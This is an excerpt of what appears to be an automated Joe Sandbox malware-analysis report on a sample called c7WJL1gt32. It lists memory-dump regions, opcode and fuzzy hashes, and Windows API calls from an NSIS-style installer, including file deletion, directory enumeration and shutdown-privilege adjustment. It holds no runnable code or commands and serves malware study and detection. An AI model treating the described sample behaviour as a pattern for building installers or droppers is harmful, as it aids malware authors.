                                                                                                          • Instruction ID: c4858e4f2104acd1ad53fca291a215cac47d5049709a40c683b30b8b4a6d6f92
                                                                                                          • Opcode Fuzzy Hash: ed64a8a850e16b5ae9c28f51d38d9dfffcfeb9894a626af35a35dbf20ed25bd9
                                                                                                          • Instruction Fuzzy Hash: D7C08032245610175618B71CB49449ED755CDC5B21755CD37F015C331C4D549E8F41D5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4dd03d65325ff51ce90063b49ea300d63efaab7684bbb57e361b77c0e3dc1ac0
                                                                                                          • Instruction ID: 5d39673ff3dda1f1c15574d7a59b021d78d5ac07401d87da6385cf86c827af8b
                                                                                                          • Opcode Fuzzy Hash: 4dd03d65325ff51ce90063b49ea300d63efaab7684bbb57e361b77c0e3dc1ac0
                                                                                                          • Instruction Fuzzy Hash: B8C08C74041E0A8BE2082FA0BC0CB79B7B8B707313FC82D10F00C028308BB84414C644
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0bd4da4ca03a22f32e64dba5b06d1ee0c006189b65dffc29a1f34a77f02d2ea7
                                                                                                          • Instruction ID: d0799337c0d1436da290dbcb5fdb69ae11b9abef3b67e3f9b9f5e48a608bc981
                                                                                                          • Opcode Fuzzy Hash: 0bd4da4ca03a22f32e64dba5b06d1ee0c006189b65dffc29a1f34a77f02d2ea7
                                                                                                          • Instruction Fuzzy Hash: 8BC012304853084FC605F769DD45569772BA7C07047449520A1090667FDFB49DDF4AD0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2ab60b495091687265f8073e9158fc67aadf64579fe35d2c9d2dd495d5550b55
                                                                                                          • Instruction ID: d18e95ca5c0e5bf7e5c4c29591dba077ab812ab6cf9f64c8501eeae98ee8c37f
                                                                                                          • Opcode Fuzzy Hash: 2ab60b495091687265f8073e9158fc67aadf64579fe35d2c9d2dd495d5550b55
                                                                                                          • Instruction Fuzzy Hash: B3C08C302AC2048FE200AB1DC984A5173ACEF85B04F0058E1F1088B739CA22FC004604
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                          • GetVersion.KERNEL32 ref: 004034CE
                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                          • #17.COMCTL32(?,00000006,?,0000000A), ref: 0040353E
                                                                                                          • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,?,0000000A), ref: 00403576
                                                                                                          • CharNextW.USER32(00000000,00435000,?,00435000,00000000,?,00000006,?,0000000A), ref: 004035AE
                                                                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                          • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,?,0000000A), ref: 004036E8
                                                                                                          • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,?,0000000A), ref: 004036F9
                                                                                                          • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,?,0000000A), ref: 00403705
                                                                                                          • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,?,0000000A), ref: 00403719
                                                                                                          • lstrcatW.KERNEL32(00437800,Low,?,00000006,?,0000000A), ref: 00403721
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,?,0000000A), ref: 00403732
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,?,0000000A), ref: 0040373A
                                                                                                          • DeleteFileW.KERNEL32(00437000,?,00000006,?,0000000A), ref: 0040374E
                                                                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                          • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403819
                                                                                                          • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                          • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040384D
                                                                                                          • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040385C
                                                                                                          • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403867
                                                                                                          • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403873
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,?,0000000A), ref: 0040388F
                                                                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?,?,00000006,?,0000000A), ref: 004038E9
                                                                                                          • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,?,0000000A), ref: 004038FD
                                                                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,?,0000000A), ref: 0040392A
                                                                                                          • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403959
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                          • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                          • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                          • API String ID: 3441113951-334447862
                                                                                                          • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                          • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                          • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                          • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404E39
                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                          • SetWindowLongW.USER32(?,?,004053C4), ref: 00404E65
                                                                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404E79
                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404EBF
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404FFD
                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 0040500B
                                                                                                          • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405193
                                                                                                          • SendMessageW.USER32(?,00000420,00000000,?), ref: 004051B7
                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                          • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                          • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $M$N
                                                                                                          • API String ID: 1638840714-813528018
                                                                                                          • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                          • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                          • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                          • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "$0oNp$LjNp$LjNp$LjNp$LjNp$LjNp$LjNp$LjNp$LjNp$PHkq$PHkq$PHkq$PHkq$PHkq$PHkq$PHkq$PHkq
                                                                                                          • API String ID: 0-79368051
                                                                                                          • Opcode ID: 14421ecf1fa3a025b9d2d93030f4ba6d6bbabdbae76e7456feeb1c8d93c4fbec
                                                                                                          • Instruction ID: e969f8176e8cfff69cb948001b303b9d3ace9a61a87a4c03fd6b9c2c0f3e1fb6
                                                                                                          • Opcode Fuzzy Hash: 14421ecf1fa3a025b9d2d93030f4ba6d6bbabdbae76e7456feeb1c8d93c4fbec
                                                                                                          • Instruction Fuzzy Hash: 36328F74E40218CFDB68DF69C984B9DBBB2BF89300F1080A9D909A7365DB759E85CF10
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,00437800,74DF2EE0,00000000), ref: 00405B23
                                                                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,74DF2EE0,00000000), ref: 00405B6B
                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,74DF2EE0,00000000), ref: 00405B8E
                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,74DF2EE0,00000000), ref: 00405B94
                                                                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,74DF2EE0,00000000), ref: 00405BA4
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: 0WB$\*.*
                                                                                                          • API String ID: 2035342205-351390296
                                                                                                          • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                          • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                          • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                          • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "$0oNp$PHkq$PHkq$PHkq$PHkq$PHkq$PHkq$PHkq$PHkq
                                                                                                          • API String ID: 0-888174444
                                                                                                          • Opcode ID: d91e5e43b7ab400a9204c83c24e86259f1065c71e080991e2297ffc7944f7083
                                                                                                          • Instruction ID: e2a83ecf398de57a810f8ac7ae99e8984e8a9391230d4151df0b767d1aba36b0
                                                                                                          • Opcode Fuzzy Hash: d91e5e43b7ab400a9204c83c24e86259f1065c71e080991e2297ffc7944f7083
                                                                                                          • Instruction Fuzzy Hash: 350291B4E402188FDB58DF69C984BDDBBB2BF89300F1081A9D909A7365DB359E85CF14
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                          • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                          • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                          • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,74DF2EE0,00405B1A,?,00437800,74DF2EE0), ref: 00406736
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID: xgB
                                                                                                          • API String ID: 2295610775-399326502
                                                                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                          • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                          • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: D
                                                                                                          • API String ID: 0-2746444292
                                                                                                          • Opcode ID: 836792712b543976eba727f14fb4ac69a3340f8a71fd7f6bb882757092d0115a
                                                                                                          • Instruction ID: 735c28342c15c319b79403becacbbd25bf242d319fc2376077569eb4d11f5198
                                                                                                          • Opcode Fuzzy Hash: 836792712b543976eba727f14fb4ac69a3340f8a71fd7f6bb882757092d0115a
                                                                                                          • Instruction Fuzzy Hash: 05C1B474E00218CFEB14DFA9C994B9DBBB2BF89304F1081A9D509AB355DB359E85CF50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: u8,
                                                                                                          • API String ID: 0-3853202635
                                                                                                          • Opcode ID: baae201ddbb4bd52e2428d2201ecdb7b25d645d4178e265ce67e0d492e82f8a1
                                                                                                          • Instruction ID: be38c065e9d41a709ed95060ec90ccb1c9aa4e19f79296997f0312862e514b9a
                                                                                                          • Opcode Fuzzy Hash: baae201ddbb4bd52e2428d2201ecdb7b25d645d4178e265ce67e0d492e82f8a1
                                                                                                          • Instruction Fuzzy Hash: B0C19074E00218CFEB14DFA9C994B9DBBB2BB89304F6081A9D508BB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2d5608708c3f1e261d955c1ae69556c534691f1be0cc4fbbf93b9e5452ae7085
                                                                                                          • Instruction ID: 7a27a4c7c50b590fcc42dc0abeaa4652308fc8c2a37fbffe6bd7f9b336b4ff10
                                                                                                          • Opcode Fuzzy Hash: 2d5608708c3f1e261d955c1ae69556c534691f1be0cc4fbbf93b9e5452ae7085
                                                                                                          • Instruction Fuzzy Hash: 6E629B74A01228CFDB64DF69C984B9DBBB2BB89301F1085EAD409A7365DB359E85CF40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 12943861d81469962ec3ed1b60eaee556524c4426561609f1311b4765c77b940
                                                                                                          • Instruction ID: da65b7948c09c8b525ced22a6f4ba4b63de88bd1ba9e5a381db45bbb67fc3f12
                                                                                                          • Opcode Fuzzy Hash: 12943861d81469962ec3ed1b60eaee556524c4426561609f1311b4765c77b940
                                                                                                          • Instruction Fuzzy Hash: 1DC1B174E01218CFEB14DFA5C994BADBBB2AF89304F2080A9D509BB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2e8442c2e78619b11de93a0adbdbaa15ed8dfae9b48af669129dcb43f211e001
                                                                                                          • Instruction ID: abaa1895064f0b22c45daf4f2b0537cb59f28f6871d90a9732192f507b2a1fc3
                                                                                                          • Opcode Fuzzy Hash: 2e8442c2e78619b11de93a0adbdbaa15ed8dfae9b48af669129dcb43f211e001
                                                                                                          • Instruction Fuzzy Hash: C5C1A174E00218CFEB14DFA9C994B9DBBB2AF89304F5080A9D508BB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f2c361e52d76a6945e4776ade07febebc1db577d2dc6d539a9490d301c93cf0
                                                                                                          • Instruction ID: fe03bfc8b5d6f0422b90e40a31c677aca9ab49c64e202b48cf4ef5a73eeeb9e3
                                                                                                          • Opcode Fuzzy Hash: 2f2c361e52d76a6945e4776ade07febebc1db577d2dc6d539a9490d301c93cf0
                                                                                                          • Instruction Fuzzy Hash: CBC1B474E00218CFEB14DFA9C994B9DBBB2AF89304F2081A9D509BB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 75e48adecc37f79d5ac0a3be8357d8297e3523d70275fc6b36bd034920002b36
                                                                                                          • Instruction ID: 7d92c75fcdb9ffef685cb9bf3a40de54bb2fb748b9d3b14f8f25287ca8c14e74
                                                                                                          • Opcode Fuzzy Hash: 75e48adecc37f79d5ac0a3be8357d8297e3523d70275fc6b36bd034920002b36
                                                                                                          • Instruction Fuzzy Hash: 28C19074E00218CFEB54DFA9C994BADBBB2BB89304F1080A9D508BB355DB359E85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bc4d496de435f4566afec0ea58347ad679ca57c103d9ef231b43e58377e6b1ec
                                                                                                          • Instruction ID: 7d3d7c5a8d4c349907cf8fafeed03053d02c9619266a2d945446974a63d3fb97
                                                                                                          • Opcode Fuzzy Hash: bc4d496de435f4566afec0ea58347ad679ca57c103d9ef231b43e58377e6b1ec
                                                                                                          • Instruction Fuzzy Hash: 48C1A174E00218CFEB14DFA9C994BADBBB2AF89304F1081A9D509BB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d49fe2149ebeebae0676d51c211795848db520e3b88dbbc408e7b2181078a25c
                                                                                                          • Instruction ID: 8f29124a4cc4d8df58ced8e1db248c8c6a2783223d814389950524088a379d93
                                                                                                          • Opcode Fuzzy Hash: d49fe2149ebeebae0676d51c211795848db520e3b88dbbc408e7b2181078a25c
                                                                                                          • Instruction Fuzzy Hash: FAC19174E00218CFDB14DFA9C994B9DBBB2AF89300F5081A9D509BB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bcb01efdebc4f36f52d99042a6f9ce601c8083d33a9f4df1589b39a3fc65296f
                                                                                                          • Instruction ID: 0525d4cc0189713c688afccce605d9e571f41f27f5a10d930c81ea27efd70351
                                                                                                          • Opcode Fuzzy Hash: bcb01efdebc4f36f52d99042a6f9ce601c8083d33a9f4df1589b39a3fc65296f
                                                                                                          • Instruction Fuzzy Hash: 37C1A174E00218CFDB14DFA9C994B9DBBB2BF89300F5080A9D509AB355DB359E85CF50
                                                                                                          Memory Dump Source
